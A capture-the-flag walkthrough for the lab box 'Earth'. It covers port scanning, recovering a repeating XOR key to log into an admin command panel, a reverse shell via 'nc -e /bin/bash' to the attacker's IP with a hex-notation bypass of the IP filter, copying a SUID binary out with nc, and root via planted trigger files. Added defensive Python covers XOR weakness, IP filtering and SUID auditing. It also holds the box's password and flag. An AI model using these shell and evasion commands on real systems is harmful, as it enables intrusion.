Perimeter information gathering
Target description
- Difficulty: Easy
- Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
- Target machine interface
- NIC information

| Setting | Value |
| --- | --- |
| NIC mode | VMnet8 (NAT) |
| MAC address | 00:0C:29:0F:1E:6A |
Active information gathering
- Host scan
sudo arp-scan -I eth0 192.168.16.0/24
The target's address is 192.168.16.150
- Port scan
┌──(kali💋kali)-[~]
└─$ sudo nmap -A -p- -T4 192.168.16.150
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 19:00 CST
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 53.26% done; ETC: 19:02 (0:01:06 remaining)
Nmap scan report for bogon (192.168.16.150)
Host is up (0.00054s latency).
Not shown: 65405 filtered tcp ports (no-response), 127 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-title: Bad Request (400)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
MAC Address: 00:0C:29:0F:1E:6A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms bogon (192.168.16.150)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.65 seconds
Three ports are open:

| Port | State | Service | Version |
| --- | --- | --- | --- |
| 22/tcp | open | ssh | OpenSSH 8.6 (protocol 2.0) |
| 80/tcp | open | http | Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9) |
| 443/tcp | open | ssl/http | Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9) |

- Web page information
The site cannot be reached by IP address: both web ports answer "Bad Request (400)", and the certificate in the scan names earth.local and terratest.earth.local, so the local hosts file needs an entry for those names.
sudo vim /etc/hosts
Add the line: 192.168.16.150 earth.local terratest.earth.local
Save and exit.
Browse to the site.
Penetration process
From the web page we learn:
At the bottom there are three previously sent ciphertexts; how to decrypt them is not yet known.
Port 22 is open, but brute-forcing it was unsuccessful.
- Directory scan
Scan the directories of both virtual hosts, over HTTP and HTTPS:
dirb http://earth.local
dirb http://terratest.earth.local
dirb https://earth.local
dirb https://terratest.earth.local
Visiting /admin shows a login page.
robots.txt contains a Disallow entry for /testingnotes.*.
No extension is given, so try .txt, and a page comes up.
Its content:
Testing secure messaging system notes:
* Using XOR as the encryption algorithm; it should be as safe as RSA.
* Earth has confirmed they have received the messages we sent.
* testdata.txt is used to test the encryption.
* terra is used as the username for the admin portal.
Todo:
* How do we send our monthly key to Earth securely? Or should we change keys weekly?
* Need to test different key lengths to protect against brute forcing. How long should the key be?
* Need to improve the messaging interface and the admin panel; they are currently very basic.
This gives us the login username: terra
testdata.txt is where the key is stored.
Visit testdata.txt:
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
- Decryption
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
Looking closely at the decrypted output, it is one string repeating.
Try that string as the password.
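The notes claim XOR "should be as safe as RSA". What the write-up actually does when it XORs a ciphertext against testdata.txt is a known-plaintext attack on repeating-key XOR: C xor P = K at every position where P is known, and the recovered keystream repeats with the key's period, which is why the output above is one string repeated. The Python below is an added example (not the write-up's or the box's code) with a constructed key and message; every function and variable name is my own.

```python
"""Added example (not from the original write-up): a known-plaintext attack on
repeating-key XOR, the scheme the testing notes describe. Key and message are
constructed; they are not the box's real values."""
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt: XOR data against the key repeated as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Wherever the plaintext is known, C xor P gives the keystream byte."""
    n = min(len(ciphertext), len(known_plaintext))
    return xor_bytes(ciphertext[:n], known_plaintext[:n])


def shortest_period(stream: bytes) -> bytes:
    """The keystream of a repeating-key cipher is the key written out end to
    end, so its shortest repeating unit is the key itself."""
    for p in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return stream[:p]
    return stream


def recover_key(cipher_hex: str, known_plaintext: bytes) -> bytes:
    """Full attack on a hex-encoded ciphertext. If the known plaintext is
    shorter than the key, only a prefix of the key comes back."""
    stream = recover_keystream(bytes.fromhex(cipher_hex), known_plaintext)
    return shortest_period(stream)


# Constructed fixture: a "monthly key" and a message "sent to Earth".
SAMPLE_KEY = b"notthekey2024"
SAMPLE_PLAINTEXT = (b"Earth formed over 4.5 billion years ago. Within the first "
                    b"billion years life appeared in the oceans.")
SAMPLE_CIPHERTEXT_HEX = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY).hex()


if __name__ == "__main__":
    # Only the first 40 plaintext bytes are assumed known; that is already
    # longer than the key, so the whole key falls out.
    key = recover_key(SAMPLE_CIPHERTEXT_HEX, SAMPLE_PLAINTEXT[:40])
    print("recovered key:", key.decode())
    print("decrypts to  :",
          xor_bytes(bytes.fromhex(SAMPLE_CIPHERTEXT_HEX), key).decode())
```

The design lesson the notes miss: key length does nothing against this attack, because one known message longer than the key exposes the whole key, and the same key protects every message. Only a key used once and never shorter than the message (a one-time pad) makes XOR safe, which is exactly what the "monthly key" plan is not.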
- Login
Username: terra
Password: earthclimatechangebad4humans
Login succeeds and we land on a command execution page.
Check who we are: whoami
apache
Because commands are executed through the web interface, there is no shared context between one command and the next, so we need a reverse shell.
- Reverse shell
Listen on Kali:
nc -lnvp 1234
Enter on the web page:
nc -e /bin/bash 192.168.16.145 1234
Remote connections turn out to be blocked, so we rewrite the IP address in another notation (hexadecimal):
nc -e /bin/bash 0xC0.0xA8.0x10.0x91 1234
After executing it, Kali receives the connection.
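The panel rejected the first command because it contained an address written in dotted decimal, and the hex-dotted form went through because the filter matched text rather than parsing the address; nc, like anything that uses the C resolver, accepts the hex form. The Python below is an added example, not the panel's code, that puts a pattern filter next to a check which canonicalises each token through the same inet_aton routine. The sample commands are constructed and the names are my own.

```python
"""Added example (not from the original write-up): a text-pattern IP filter
next to a check that parses tokens the way the C library does. Sample
commands are constructed; the hex-dotted address is the one used above."""
import re
import socket
from typing import Optional

# The weak check: recognises only dotted-decimal literals.
DOTTED_DECIMAL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def naive_blocks(command: str) -> bool:
    """True if the command contains a dotted-decimal IPv4 literal."""
    return DOTTED_DECIMAL.search(command) is not None


def canonical_ipv4(token: str) -> Optional[str]:
    """Parse one token with inet_aton, the routine nc and friends call.
    glibc's inet_aton accepts hexadecimal (0x..) components, so the notation
    that slipped past the regex normalises to plain dotted decimal here.
    Returns the canonical form, or None if the token is not an address."""
    if "." not in token:          # ignore bare numbers such as a port
        return None
    try:
        return socket.inet_ntoa(socket.inet_aton(token))
    except OSError:
        return None


def canonical_blocks(command: str) -> bool:
    """True if any whitespace-separated token parses as an IPv4 address,
    in whatever notation it was written."""
    return any(canonical_ipv4(t) is not None for t in command.split())


if __name__ == "__main__":
    for cmd in ("ping -c 1 192.168.16.145", "ping -c 1 0xC0.0xA8.0x10.0x91"):
        print(f"{cmd!r}: regex={naive_blocks(cmd)} "
              f"canonical={canonical_blocks(cmd)}")
```

A parse-based check closes the notation gap shown here, but it is still a denylist on a string that is about to be handed to a shell. The real control is not to expose a command runner to a web login at all; if one is needed, run a fixed allowlist of actions with arguments validated by type, not a free-form command line.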
Enter a pseudo-terminal.
A pseudo-terminal makes running commands smoother:
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation
find / -perm -u=s -type f 2>/dev/null
Look for local commands with the SUID bit set.
As the name suggests, reset_root is a command that resets the root password.
Running it gives an error.
Send reset_root back to Kali for testing and analyze it with strace.
Open a listening port on Kali to receive the file:
nc -nlvp 4444 >reset_root
On the target, enter:
nc 192.168.16.145 4444 < /usr/bin/reset_root
The file is now in the Kali home directory.
Grant it all permissions.
Analyze it:
strace /home/kali/reset_root
┌──(kali💋kali)-[~]
└─$ strace /home/kali/reset_root
execve("/home/kali/reset_root", ["/home/kali/reset_root"], 0x7ffecb371020 /* 61 vars */) = 0
brk(NULL) = 0x14e2000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fc49d728000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=86974, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 86974, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fc49d712000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0Ps\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1922136, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1970000, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fc49d531000
mmap(0x7fc49d557000, 1396736, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fc49d557000
mmap(0x7fc49d6ac000, 339968, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17b000) = 0x7fc49d6ac000
mmap(0x7fc49d6ff000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ce000) = 0x7fc49d6ff000
mmap(0x7fc49d705000, 53072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fc49d705000
close(3) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fc49d52e000
arch_prctl(ARCH_SET_FS, 0x7fc49d52e740) = 0
set_tid_address(0x7fc49d52ea10) = 4494
set_robust_list(0x7fc49d52ea20, 24) = 0
rseq(0x7fc49d52f060, 0x20, 0, 0x53053053) = 0
mprotect(0x7fc49d6ff000, 16384, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ) = 0
mprotect(0x7fc49d75a000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7fc49d712000, 86974) = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x3), ...}, AT_EMPTY_PATH) = 0
getrandom("\x35\xcf\x98\xb3\x22\xaa\xe5\xc8", 8, GRND_NONBLOCK) = 8
brk(NULL) = 0x14e2000
brk(0x1503000) = 0x1503000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0) = ?
+++ exited with 0 +++
Several trigger files are missing.
Create them at the corresponding locations:
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
Once they are all created, run reset_root again.
The root password has been changed to Earth.
Log in with su; we now have root.
cd into the root directory
and find the flag.
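The find command above lists SUID binaries, and the strace output shows that reset_root decides whether to reset the password purely from access() checks on files in /dev/shm and /tmp, directories every local user can write to, so any user can satisfy its condition. The Python below is an added audit example (not from the write-up or the box) that lists SUID files under a root, pulls out any world-writable paths embedded in them, and asks rpm (Fedora) or dpkg whether the file belongs to a package, since an unpackaged SUID binary such as /usr/bin/reset_root deserves a look. The sample tree it builds is constructed and all names are my own.

```python
"""Added example (not from the original write-up): audit SUID files for the
pattern strace exposed in reset_root, decisions driven by files in
world-writable directories. The sample tree is constructed."""
import os
import shutil
import stat
import subprocess
import tempfile
from typing import Dict, List, Optional, Tuple

# Directories any local user can write to; a privileged binary that takes
# decisions from files here can be steered by an unprivileged user.
WORLD_WRITABLE_PREFIXES = (b"/tmp/", b"/dev/shm/", b"/var/tmp/")


def suid_files(root: str) -> List[str]:
    """Walk root and return regular files with the set-user-ID bit set."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def writable_path_refs(binary: str) -> List[str]:
    """Return the world-writable path strings embedded in the file
    (each prefix followed by printable, non-space bytes)."""
    with open(binary, "rb") as f:
        data = f.read()
    refs = set()
    for prefix in WORLD_WRITABLE_PREFIXES:
        start = 0
        while True:
            i = data.find(prefix, start)
            if i < 0:
                break
            end = i
            while end < len(data) and 0x21 <= data[end] <= 0x7E:
                end += 1
            refs.add(data[i:end].decode("ascii"))
            start = end
    return sorted(refs)


def package_owner(path: str) -> Optional[str]:
    """Ask the package manager (rpm on Fedora, dpkg on Debian) who owns the
    file; None means unpackaged or no package manager available."""
    if shutil.which("rpm"):
        cmd = ["rpm", "-qf", path]
    elif shutil.which("dpkg"):
        cmd = ["dpkg", "-S", path]
    else:
        return None
    res = subprocess.run(cmd, capture_output=True, text=True)
    return res.stdout.strip() if res.returncode == 0 else None


def audit(root: str) -> Dict[str, Tuple[Optional[str], List[str]]]:
    """Map each SUID file to (package owner, embedded world-writable paths)."""
    return {p: (package_owner(p), writable_path_refs(p)) for p in suid_files(root)}


def build_sample_tree() -> str:
    """Constructed fixture: a fake SUID 'binary' that names trigger files in
    /dev/shm and /tmp, plus an ordinary non-SUID file."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    fake = os.path.join(root, "reset_root_sample")
    with open(fake, "wb") as f:
        f.write(b"\x7fELF...CHECKING IF RESET TRIGGERS PRESENT...\x00"
                b"/dev/shm/trigger_a\x00/tmp/trigger_b\x00")
    os.chmod(fake, 0o4755)  # set the SUID bit after writing, not before
    with open(os.path.join(root, "plain.txt"), "w") as f:
        f.write("nothing to see\n")
    return root


if __name__ == "__main__":
    # Run against a real system with audit("/"), which takes a few minutes.
    for path, (owner, refs) in audit(build_sample_tree()).items():
        print(f"{path}: package={owner or 'NONE'} writable-path refs={refs}")
```

The string scan is a heuristic: a binary can build such paths at run time, which is why the dynamic view from strace is the more reliable one. What the audit does catch cheaply is the combination that mattered here, a SUID file no package claims that carries literal /tmp or /dev/shm paths.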
- flag
find -name "*flag*"
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]